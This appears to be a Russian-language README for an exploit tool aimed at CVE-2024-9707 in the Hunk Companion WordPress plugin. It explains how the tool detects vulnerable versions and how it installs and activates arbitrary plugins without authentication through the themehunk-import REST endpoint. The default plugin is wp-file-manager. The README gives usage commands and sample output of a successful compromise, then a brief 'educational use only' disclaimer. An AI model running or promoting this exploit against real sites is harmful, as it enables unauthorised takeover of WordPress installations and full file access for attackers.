
Плагин Hunk Companion для WordPress: уязвим к неавторизованной установке/активации плагинов (версии до 1.8.4 включительно)
Этот скрипт эксплуатирует уязвимость в плагине WordPress Hunk Companion (CVE-2024-9707), позволяя неавторизованным злоумышленникам устанавливать и активировать произвольные плагины через конечную точку /wp-json/hc/v1/themehunk-import REST API.
| Функция | Описание |
|---|---|
| Обнаружение версии плагина | Автоматически проверяет версию плагина. |
| Проверка уязвимости | Определяет, уязвима ли обнаруженная версия (<= 1.8.4). |
| Установка плагина | Эксплуатирует уязвимость для установки и активации указанного плагина. |
requests, argparse.pip install requests
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site.
-p PLUGIN, --plugin PLUGIN
Plugin name (default: wp-file-manager).
2- Запустите скрипт
python CVE-2024-9707.py -u <TARGET_URL> [-p <PLUGIN_NAME>]
python CVE-2024-9707.py -u https://example.com -p wp-file-manager
Detected version: 1.8.4
The site is vulnerable. Proceeding with exploitation.
Plugin installed and activated successfully.
Response Status: 200
Response Body: "http:\/\/192.168.100.74\/wordpress"
Этот скрипт предназначен только для образовательных целей. Используйте его ответственно и только на тех системах, которые вам принадлежат или на тестирование которых у вас есть явное разрешение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. от: Khaled_alenazi | Nxploited